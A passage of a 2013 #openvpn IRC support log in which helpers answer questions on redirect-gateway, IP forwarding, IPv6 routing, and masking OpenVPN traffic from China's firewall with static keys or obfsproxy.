respond. gotta let it check and then come back again. sorry 13:14 <@krzee> np 13:14 < Azrael_-> thanks anyway for the hints 13:15 <@krzee> with the fact that no lan sharing is involved, ild expect there was an issue with the connection or some firewall/filter issues 13:16 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 276 seconds] 13:20 < pekster> Or possibly MTU issues; it may be wise to try a ping with the DF bit set at the max MTU of the link 13:20 -!- sh_t [~sht@NL2.privatevpn.com] has quit [Ping timeout: 256 seconds] 13:20 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 13:34 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 255 seconds] 13:37 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 13:37 -!- krzie [~k@openvpn/community/support/krzee] has joined #openvpn 13:37 -!- mode/#openvpn [+o krzie] by ChanServ 13:40 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn 13:40 -!- Porkepix [~Porkepix@157.138.184.18] has joined #openvpn 13:42 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 13:42 -!- module000 [~module000@173-10-195-33-BusName-LittleRock.hfc.comcastbusiness.net] has joined #openvpn 13:42 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 13:43 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has joined #openvpn 13:47 -!- module000 [~module000@173-10-195-33-BusName-LittleRock.hfc.comcastbusiness.net] has quit [Quit: module000] 13:48 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Operation timed out] 13:49 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:57 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 14:00 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 14:00 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 255 seconds] 14:00 -!- krzie is now known as krzee 14:03 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 14:18 -!- Devastator- [~devas@186.214.110.30] has joined #openvpn 14:18 -!- Devastator- [~devas@186.214.110.30] has quit [Changing host] 14:18 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 14:19 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 256 seconds] 14:20 -!- Saviq [~Saviq@canonical/saviq] has quit [Excess Flood] 14:21 -!- Saviq [~Saviq@sawicz.net] has joined #openvpn 14:30 -!- mirco [~mirco@p50805D42.dip.t-dialin.net] has joined #openvpn 14:36 -!- Timmy [~quassel@unaffiliated/timmyt] has joined #openvpn 14:38 < Timmy> I have a .ovpn file and a .ca file which is provided by a openvpn provider, i want to use them through the commandline. there also is a username and pass i have to enter, how can i do this? can you help me? 14:39 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 276 seconds] 14:39 -!- bjh4 [~bjh4@64.212.193.1] has quit [Remote host closed the connection] 14:40 <@dazo> Timmy: openvpn --config ovpn-file --ca ca-file --auth-user-pass 14:40 <@dazo> (--auth-user-pass may already be set in the config file, though ... --ca as well) 14:40 <@dazo> !-- 14:40 <@vpnHelper> "--" is OpenVPN allows any option to be placed either on the command line or in a configuration file. Though all command line options are preceded by a double-leading-dash ("--"), this prefix is usually omitted when an option is placed in a configuration file. 14:42 -!- dazo is now known as dazo_afk 14:42 < Timmy> dazo: then how can i enter my username and password in the commandline? something like --auth-myusername-mypassword ? 14:42 < Timmy> dazo_afk: ^^ 14:44 -!- meepmeep [~meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 14:44 <+EugeneKay> It is not recommended to put user/pass as an argument 14:46 -!- krzee [~k@openvpn/community/support/krzee] has quit [Read error: Operation timed out] 14:47 < Timmy> this is the report of openvn when i tried to connect: http://paste.kde.org/689000/ 14:47 < Timmy> what is the problem? 14:49 <+EugeneKay> That appears to be a client log. What's the server log look like? 14:50 < Timmy> EugeneKay: I don't have access to the server 14:51 <+EugeneKay> !both 14:51 <@vpnHelper> "both" is If you do not control both ends of the link (server and client) then there is not much we can do to help you. Please talk to your network admin instead. 15:05 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:13 -!- Devastator- [~devas@unaffiliated/devastator] has quit [Remote host closed the connection] 15:14 -!- Devastator [~devas@186.214.110.30] has joined #openvpn 15:29 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 15:29 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 15:29 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 15:29 -!- mode/#openvpn [+o krzee] by ChanServ 15:34 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 15:50 -!- Timmy [~quassel@unaffiliated/timmyt] has left #openvpn ["http://quassel-irc.org - Chat comfortably. Anywhere."] 15:52 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 16:02 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds] 16:05 -!- WolfX [~subzero@94.54.203.154] has joined #openvpn 16:06 < WolfX> Hi, my win7 client is connected to openvpn server on debian linux but it still browses websites directly. 16:07 <+EugeneKay> !redirect 16:07 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 16:07 <@vpnHelper> http://ircpimps.org/redirect.png 16:07 <+EugeneKay> WolfX - follow the chart ^ 16:08 < WolfX> ok thanks. 16:12 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 245 seconds] 16:20 < WolfX> !ipforward 16:20 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 16:24 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has quit [Quit: Ex-Chat] 16:25 < WolfX> !linipforward 16:25 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 16:31 -!- Porkepix_ [~Porkepix@ks353551.kimsufi.com] has joined #openvpn 16:32 -!- Porkepix [~Porkepix@157.138.184.18] has quit [Ping timeout: 255 seconds] 16:32 -!- Porkepix_ is now known as Porkepix 16:32 -!- speed_racer8 [~speed_rac@76.30.149.251] has quit [Quit: Leaving] 16:34 < WolfX> EugeneKay: in the chart it asks me if i can ping 8.8.8.8 but i cannot even ping VPN server ip after redirect-gateway def1 in client.ovpn in win7 16:36 < rob0> The very first box, "Can you ping the VPN IP of the server?" -> No: -> "Fix your VPN." 16:36 < rob0> A flowchart is meant to be followed in order. 16:38 < WolfX> oh, yes but i did default installation in debian according to : https://community.openvpn.net/openvpn/wiki/BridgingAndRouting exactly, and routing option is exactly my case. 16:38 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net) 16:39 < WolfX> how am i connect to the VPN server if i cannot ping it ? 16:39 < WolfX> connected* 16:43 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Ping timeout: 248 seconds] 16:43 < pekster> A "connected" VPN just means the control channel succeeded it's initial connection and hasn't timed out or explicitly disconnected. Firewalls are usually the cause of connection issues after that point 16:43 < pekster> Also, why are you bridging? 16:43 < pekster> !tunortap 16:43 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 16:43 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 16:43 -!- ade_b [~Ade@koln-5d817e98.pool.mediaWays.net] has joined #openvpn 16:43 -!- ade_b [~Ade@koln-5d817e98.pool.mediaWays.net] has quit [Changing host] 16:43 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 16:44 < WolfX> pekster: i'm not, my option is routing. 16:44 -!- Porkepix [~Porkepix@157.138.184.18] has joined #openvpn 16:45 -!- ade_b [~Ade@redhat/adeb] has quit [Client Quit] 16:46 < pekster> At a quick skimming, that guide doesn't deal with firewall issues for connectivity between the client & peer 16:46 < pekster> It's more of a guide for after you have a working VPN. Start with that first, becuase nothing else works if you can't communicate properly with your VPN peer 16:46 < pekster> The official howto is: 16:46 < pekster> !howto 16:46 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 16:47 -!- mirco [~mirco@p50805D42.dip.t-dialin.net] has quit [Quit: mirco] 16:52 -!- mirco [~mirco@p50805D42.dip.t-dialin.net] has joined #openvpn 16:52 -!- computron [~IceChat77@smtp.utiglobal.net] has quit [Ping timeout: 272 seconds] 16:53 -!- Porkepix [~Porkepix@157.138.184.18] has quit [Quit: Computer has gone to sleep.] 16:53 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 17:13 -!- mirco [~mirco@p50805D42.dip.t-dialin.net] has quit [Quit: mirco] 17:20 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Remote host closed the connection] 17:20 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 17:20 -!- mode/#openvpn [+o krzee] by ChanServ 17:20 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 17:24 < WolfX> i have debianPC (VPN server) and Win7(client) on the same network. I wanna install openVPN server on debian and connect internet from Win7 and pass through debian. This is for test only. 17:24 < WolfX> both have local IP behind router with 192.168.0.x ip. Is this possible or am i wasting my time tryign to setup openvpn in LAN? 17:24 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Ping timeout: 245 seconds] 17:26 -!- mirco [~mirco@p50805D42.dip.t-dialin.net] has joined #openvpn 17:26 <@krzee> possible but pointless 17:27 <@krzee> !local 17:27 <@vpnHelper> "local" is a flag for --redirect-gateway, Add the local flag if both OpenVPN machines are directly connected via a common subnet, such as with wireless. 17:27 <@krzee> !redirect 17:27 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 17:27 <@vpnHelper> http://ircpimps.org/redirect.png 17:29 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 17:37 < WolfX> !def1 17:37 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 17:37 -!- zamba [marius@flage.org] has quit [Ping timeout: 252 seconds] 17:37 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has quit [Ping timeout: 252 seconds] 17:38 -!- novaflash [~novaflash@vpnserver1.jellemaautomatisering.nl] has joined #openvpn 17:38 -!- WolfX [~subzero@94.54.203.154] has quit [Quit: Leaving.] 17:39 -!- zamba [marius@flage.org] has joined #openvpn 17:39 -!- WolfX [~subzero@94.54.203.154] has joined #openvpn 17:39 -!- novaflash [~novaflash@vpnserver1.jellemaautomatisering.nl] has quit [Changing host] 17:39 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has joined #openvpn 17:39 -!- mode/#openvpn [+o novaflash] by ChanServ 17:46 -!- mirco [~mirco@p50805D42.dip.t-dialin.net] has quit [Quit: mirco] 17:49 -!- WolfX [~subzero@94.54.203.154] has quit [Quit: Leaving.] 18:11 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 18:11 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 18:21 -!- JSharpe [~JSharpe@46.165.210.17] has quit [Quit: Leaving] 18:38 -!- mellow89 [~mellow89@108-171-179-235.static.cloud-ips.com] has joined #openvpn 18:40 < mellow89> hi 18:43 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:01 < mellow89> does openvpn tunnel all my pcs traffic? 19:02 < rob0> by default, no, but it does do what you tell it to do. 19:02 < rob0> !redirect 19:02 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 19:02 <@vpnHelper> http://ircpimps.org/redirect.png 19:04 < mellow89> what traffic is redirected by default when you install it? 19:05 < rob0> no redirection without --redirect-gateway 19:05 < rob0> !howto 19:05 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 19:14 -!- ele_ [~maarten@pinky.elexer.com] has joined #openvpn 19:16 -!- ele [~maarten@pinky.elexer.com] has quit [Ping timeout: 264 seconds] 19:16 -!- mellow89 [~mellow89@108-171-179-235.static.cloud-ips.com] has quit [Quit: http://www.kiwiirc.com/ - A hand-crafted IRC client] 19:18 -!- mellow89 [~mellow89@108-171-179-235.static.cloud-ips.com] has joined #openvpn 19:21 -!- newbie|3 [~tjz@bb219-74-43-126.singnet.com.sg] has joined #openvpn 19:24 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 255 seconds] 19:33 -!- Devastator [~devas@186.214.110.30] has quit [Changing host] 19:33 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 19:41 -!- raidz is now known as raidz_away 19:44 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 248 seconds] 19:50 -!- WolfX [~subzero@94.54.203.154] has joined #openvpn 19:52 < mellow89> thanks 19:52 -!- mellow89 [~mellow89@108-171-179-235.static.cloud-ips.com] has quit [Quit: http://www.kiwiirc.com/ - A hand-crafted IRC client] 19:55 -!- WolfX1 [~subzero@94.54.203.154] has joined #openvpn 19:58 -!- WolfX [~subzero@94.54.203.154] has quit [Ping timeout: 256 seconds] 20:28 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 20:31 -!- mezgani [~mezgani@41.249.4.68] has joined #openvpn 20:33 -!- p3rror [~mezgani@41.140.180.37] has quit [Ping timeout: 245 seconds] 20:43 -!- Varazir [~mircwars@c-94-255-130-47.cust.bredband2.com] has quit [Ping timeout: 264 seconds] 20:44 -!- Varazir [~mircwars@c-94-255-130-47.cust.bredband2.com] has joined #openvpn 20:46 -!- WolfX1 [~subzero@94.54.203.154] has left #openvpn [] 21:03 -!- APTX [APTX@unaffiliated/aptx] has quit [Ping timeout: 245 seconds] 21:05 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 21:08 -!- ravel_exe [ravel_exe@175.136.85.24] has joined #openvpn 21:29 -!- DaveTheDude [~FuckOff@69.85.93.87] has joined #openvpn 21:30 < DaveTheDude> Hey, i was in here last night asking about the latest version. Well i figured out how to get the latest version working properly... but i'm wondering how ipv6 support works. 21:31 < DaveTheDude> Doesn't this mean that i do not have ipv6 setup? 21:31 < DaveTheDude> Wed Mar 06 22:18:20 2013 us=649414 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0 21:31 < DaveTheDude> Wed Mar 06 22:18:20 2013 us=649414 MANAGEMENT: >STATE:1362626300,ASSIGN_IP,,10.8.0.6, 21:31 < DaveTheDude> Wed Mar 06 22:18:20 2013 us=649414 open_tun, tt->ipv6=0 21:33 -!- ravel_cmd [ravel_exe@175.136.85.24] has joined #openvpn 21:34 < DaveTheDude> i don't have any specific ipv6 needs. i just want any and all ipv6 traffic from home, to be routed through my remote server 21:36 -!- ravel_exe [ravel_exe@175.136.85.24] has quit [Ping timeout: 252 seconds] 21:36 -!- ravel_exe [ravel_exe@175.136.85.24] has joined #openvpn 21:39 -!- ravel_cmd [ravel_exe@175.136.85.24] has quit [Ping timeout: 250 seconds] 21:39 -!- ravel_cmd [ravel_exe@175.136.85.24] has joined #openvpn 21:43 -!- ravel_exe [ravel_exe@175.136.85.24] has quit [Ping timeout: 256 seconds] 21:45 -!- ravel_exe [ravel_exe@175.136.85.24] has joined #openvpn 21:47 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 21:48 -!- ravel_cmd [ravel_exe@175.136.85.24] has quit [Ping timeout: 248 seconds] 21:48 -!- ravel_cmd [ravel_exe@175.136.85.24] has joined #openvpn 21:52 -!- ravel_exe [ravel_exe@175.136.85.24] has quit [Ping timeout: 276 seconds] 21:54 -!- ravel_exe [ravel_exe@175.136.85.24] has joined #openvpn 21:55 -!- ravel_cmd [ravel_exe@175.136.85.24] has quit [Ping timeout: 245 seconds] 21:55 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 245 seconds] 21:56 < DaveTheDude> any ideas or help? 21:58 -!- ravel_cmd [ravel_exe@175.136.85.24] has joined #openvpn 22:01 -!- ravel_exe [ravel_exe@175.136.85.24] has quit [Ping timeout: 252 seconds] 22:01 -!- ravel_exe [ravel_exe@175.136.85.24] has joined #openvpn 22:05 -!- ravel_cmd [ravel_exe@175.136.85.24] has quit [Ping timeout: 245 seconds] 22:05 -!- ravel_cmd [ravel_exe@175.136.85.24] has joined #openvpn 22:06 -!- pulz_ [geir@winning.no] has quit [Read error: Operation timed out] 22:08 -!- ravel_exe [ravel_exe@175.136.85.24] has quit [Ping timeout: 256 seconds] 22:10 -!- ravel_exe [ravel_exe@175.136.85.24] has joined #openvpn 22:11 -!- ravel_cmd [ravel_exe@175.136.85.24] has quit [Ping timeout: 255 seconds] 22:14 -!- ravel_cmd [ravel_exe@175.136.85.24] has joined #openvpn 22:17 -!- ravel_exe [ravel_exe@175.136.85.24] has quit [Ping timeout: 256 seconds] 22:19 -!- ravel_exe [ravel_exe@175.136.85.24] has joined #openvpn 22:20 -!- ravel_cmd [ravel_exe@175.136.85.24] has quit [Ping timeout: 245 seconds] 22:22 -!- pulz [geir@winning.no] has joined #openvpn 22:27 -!- ravel_cmd [ravel_exe@175.136.85.24] has joined #openvpn 22:31 -!- ravel_exe [ravel_exe@175.136.85.24] has quit [Ping timeout: 255 seconds] 22:33 < pekster> DaveTheDude: Look at the --tun-ipv6 option 22:33 < DaveTheDude> yes i see many option here 22:34 < DaveTheDude> the problem is that i don't exactly know how to use them 22:34 -!- ravel_cmd [ravel_exe@175.136.85.24] has quit [Ping timeout: 260 seconds] 22:34 < pekster> So, did you see/read the manpage section titled "IPv6 Related Options" 22:34 < DaveTheDude> i don't really have any specific ipv6 needs, i just want any ipv6 traffic to route through my server 22:34 < pekster> Push a route for the global IP space then 22:35 < DaveTheDude> no i didn't see a specific section that said IPv6 related options 22:36 < pekster> That'll show you all the config options you need to know 22:36 < DaveTheDude> i am reading this... https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage 22:36 <@vpnHelper> Title: Openvpn23ManPage – OpenVPN Community (at community.openvpn.net) 22:36 < pekster> Yup, that'll do fine 22:36 < DaveTheDude> yeah i see a lot of options, but when you said this " Push a route for the global IP space then" 22:36 < DaveTheDude> you lost me 22:37 < pekster> 2000::/3 is the global routable IPv6 space currently assigned 22:37 < DaveTheDude> sorry, i know how to set things up basically, but i'm still a bit of a nub 22:37 < pekster> Just like def1 in IPv4 pushes a 0/1 and 128/1 route, 2000::/3 is the v6 equivelent 22:38 < DaveTheDude> you lost me again 22:38 < DaveTheDude> that is out of my depth 22:38 < pekster> It's going to be hard to set up IPv6 if you're not familiar with IPv6 to start with 22:39 < DaveTheDude> well i don't want ipv6 to be something that isn't covered when i am connected 22:40 < DaveTheDude> how would i go about pushing a route for the global IP space? 22:41 < pekster> Let's back up a step: what is your goal, what do you want to do? Are you currently IPv6 enabled on both your server and client? 22:45 < DaveTheDude> sorry, my grandma called 22:47 < DaveTheDude> my server is 22:47 < DaveTheDude> my home os is windows 22:48 < DaveTheDude> i don't have an ipv6 IP... but i get a lot of ipv6 network chatter 22:48 < pekster> If you don't have globally assinged IP space at least on the server, you'll be unable to assign usable IP space to clients 22:49 < pekster> You need to give OpenVPN a block of space, either a /112 or a /64 that it will then assign to clients 22:50 < pekster> If you don't have a PD (Prefix Deligation) or routed IPv6 block assigned to the server, you can't serve IPv6 access to clients 22:50 < DaveTheDude> this is what i have in my server's network interfaces 22:50 < DaveTheDude> iface eth0 inet6 static 22:50 < DaveTheDude> address 2001:1111:1:1111::1 22:50 < DaveTheDude> i changed the address 22:51 < DaveTheDude> actually i should have posted all of what is there 22:51 < pekster> !paste 22:51 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 22:51 < pekster> !interface 22:51 <@vpnHelper> "interface" is (#1) paste interface configuration from both client and server, while being disconnected and when beeing connected. Be sure to also add the routing tables for both situations from client and from server or (#2) For Windows: iface: 'ipconfig /all' routing: 'route print' (add -4 or -6 for just IPv4 or v6) or (#3) For Unix: iface: 'ifconfig -a' routing: 'netstat -rn' or (#4) For Linux: 22:51 <@vpnHelper> iface: 'ip a' routing: 'ip r' (use ip -6 for IPv6 routes) 22:51 < pekster> But that's still largely irrevelent since you need a routed block to assign to OpenVPN 22:52 < pekster> It won't really help to know how you're connected to your upstream network 22:52 < pekster> This channel really isn't the right place to ask about how to get PD or route assingment/deligation working. #ipv6 might be a better place, but you need to know your own network details before you can expect to use openvpn with any of it 22:53 < pekster> Some guy a while back got on-link IPs working with clients in tun mode, but it required sorcery to get the server to respond to the NDP request 22:54 < DaveTheDude> http://pastebin.com/0s4gufnx 22:54 < DaveTheDude> is that sufficient? 22:54 < pekster> So, you want to use a routed block unless you're prepared to sacrifice a goat or whatever he did 22:54 < pekster> Probably not 22:54 < DaveTheDude> i see 22:55 < pekster> Unless you'd like do to whatever NDP proxying is required to expose on-link IPs to clients 22:55 < pekster> (the v6 version of ARP proxy) 22:55 < DaveTheDude> what exactly are the requirements to make the latest version of openvpn work with ipv6? 22:55 < pekster> So, re-read what I wrote above about obtaining a PD or routed block from your network provider, and the assign openvpn a /112 or /64 out of that as I described above 22:55 -!- latenite [~latenite@138.77.121.79] has joined #openvpn 22:56 < pekster> Instead of doing this through your VPN, why not just get a tunnel broker and set that up on your client if you want to get IPv6 access? 22:56 < DaveTheDude> is the "full ipv6 support" really meant for people who want to use specifically ipv6 and not just route their ipv6 and ipv4 traffic through openvpn? 22:57 < pekster> Sure. If you want IPv6 access across the tunnel, use a >=2.3.0 (patches exist for the 2.2 series too) 22:57 < DaveTheDude> yeah i use to use HE for that 22:57 < DaveTheDude> I will be updating to 2.3.0 tonight tho 22:58 < DaveTheDude> just using 2.3.0 won't actually route any and all ipv6 traffic through openvpn tho 22:58 < DaveTheDude> will it? 22:59 < DaveTheDude> i'll be using the debian repo found here https://community.openvpn.net/openvpn/wiki/OpenvpnSoftwareRepos 22:59 <@vpnHelper> Title: OpenvpnSoftwareRepos – OpenVPN Community (at community.openvpn.net) 22:59 < pekster> You need --route-ipv6 to push IPv6 routes, and of course that requires a v6 IP on both ends (via --tun-ipv6 and the relevant --ifconfig-ipv6 or --server-ipv6 options) 23:02 < pekster> Get your upstream IPv6 addressing & routes figured out first, then mess with openvpn after that's set up 23:02 < pekster> It's worthless to assign address you don't have 23:03 < DaveTheDude> i see 23:04 < DaveTheDude> so i would be better off to simply turn off ipv6 in windows 23:04 < pekster> Even a routed /64 should be fine; you can either let openvpn use that, or all you really need is a /112 from that range (since that gives up support for "up to 65,536" clients, more than you'll be able to connect) 23:05 < pekster> Well, if you have IPv6 access in Windows, I'm still confused why you want to get another address assigned on your server to start with 23:06 < pekster> It's not like tunneling through openvpn is going to give you anything special your HE tunnel doesn't already 23:06 < DaveTheDude> i no longer use HE 23:06 < pekster> If you have no IPv6 access on Windows, you don't need to turn anything off if you don't want it... 23:06 < DaveTheDude> and yes windows confuses me as well 23:06 < DaveTheDude> i do not have an ipv6 home address 23:07 < DaveTheDude> yet i see ipv6 network traffic frequently 23:07 < pekster> On your private LAN? 23:09 < DaveTheDude> i was trying to find an example 23:10 < DaveTheDude> i can't always tell where it is from or going 23:13 < DaveTheDude> well, thank you pekster 23:13 < DaveTheDude> have a good night. 23:14 -!- DaveTheDude [~FuckOff@69.85.93.87] has quit [Quit: Senkei.Senbonzakura.Kageyoshi] 23:14 < pekster> If you see RAs on your ISP's network, they're probably offering IPv6 access that way, and usually a PD if you ask for it via dhcpv6 23:14 < pekster> Well, that #ipv6 land anyway I guess... 23:15 -!- MeanderingCode [~Meanderin@199.254.238.216] has joined #openvpn 23:16 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 23:25 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 23:27 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 23:30 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 23:32 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 23:33 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 23:34 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 23:45 -!- Orbi [~opera@anon-147-110.vpn.ipredator.se] has joined #openvpn 23:47 -!- Orbi [~opera@anon-147-110.vpn.ipredator.se] has left #openvpn [] 23:49 -!- latenite [~latenite@138.77.121.79] has quit [Ping timeout: 264 seconds] --- Day changed Thu Mar 07 2013 00:00 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has quit [Ping timeout: 245 seconds] 00:02 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has joined #openvpn 00:11 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 00:15 -!- ddlk [~ddlk@ec2-54-235-194-90.compute-1.amazonaws.com] has joined #openvpn 00:16 < ddlk> Hi, guys, I am wondering that is openvpn packet detectable? 00:19 < pekster> Yes, when using X509 (also known as "server" or "TLS" modes of operation) the OpenVPN protocol has a detectable fingerprint 00:19 < pekster> Shared secret (by using the --secret option) uses symmetric encryption directly, so it appears as completely random data inside the UDP/TCP packet with no dectable fingerprint 00:20 < ddlk> Once the connection is established, the existence of vpn cannot be detected, right? 00:21 < ddlk> I am from China, every time I want to connect to my vpn server, I have to change its port, or the connection will not success 00:22 < pekster> You may have better luck using the p2p mode (instead of the server/client mode with certs) because otherwise your connections can be fingerprinted as OpenVPN by various packet inspection techniques 00:22 -!- latenite [~latenite@138.77.121.79] has joined #openvpn 00:23 < ddlk> But I have severial devices (pc and mobile) need to connect to vpn, p2p is not suitable for this 00:24 < ddlk> I once use pptpd, but it seems rather un-stable, it disconnects a lot 00:24 < pekster> You would need multiple instances running on the server, but it is doable like that 00:25 < ddlk> I'll try the pre-shared key, hope it will work :D 00:26 < pekster> And if you haven't already, using some obscure randomly-chosen port is wise too: 1194 is the IANA standard for OpenVPN, and to mask what the encrypted traffic is you're better off picking something randomly above port 30000 00:26 < ddlk> wondering if there exist some vpn that cannot be detected, the GFW thing is really annoying 00:26 < pekster> There's also the obfs proxy project, but I don't have experience with that 00:26 < pekster> !obfs 00:26 <@vpnHelper> "obfs" is (#1) if you are looking to obfuscate your traffic to get through a firewall that recognizes and blocks openvpn, try using this proxy: obfsproxy https://www.torproject.org/projects/obfsproxy.html.en to encapsulate your packets in other protocols or (#2) http://community.openvpn.net/openvpn/wiki/TrafficObfuscation or (#3) in client/server mode an admin can know that openvpn is being used. 00:26 <@vpnHelper> in static-key mode they only know that it is some encrypted data, but not specifically openvpn; however with static-key you lose forward security (!forwardsecurity) 00:28 < ddlk> 1194 is long dead in China, every time I connect to the server, I have choose another one. 00:28 < pekster> Right, chances are some DPI device flags the traffic and eventually blocks the IP and/or port you're using 00:29 < pekster> Hence my suggestion to use either static-key or look into that obfsproxy project to mask the fingerprint the spy device can use 00:29 < ddlk> Looking into obfsproxy ~ 00:36 < ddlk> seems they only have a browser bundle for download 00:38 -!- mirco [~mirco@p508062C9.dip.t-dialin.net] has joined #openvpn 00:51 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 00:51 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 00:51 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 00:52 -!- mode/#openvpn [+o krzee] by ChanServ 00:52 -!- Porkepix 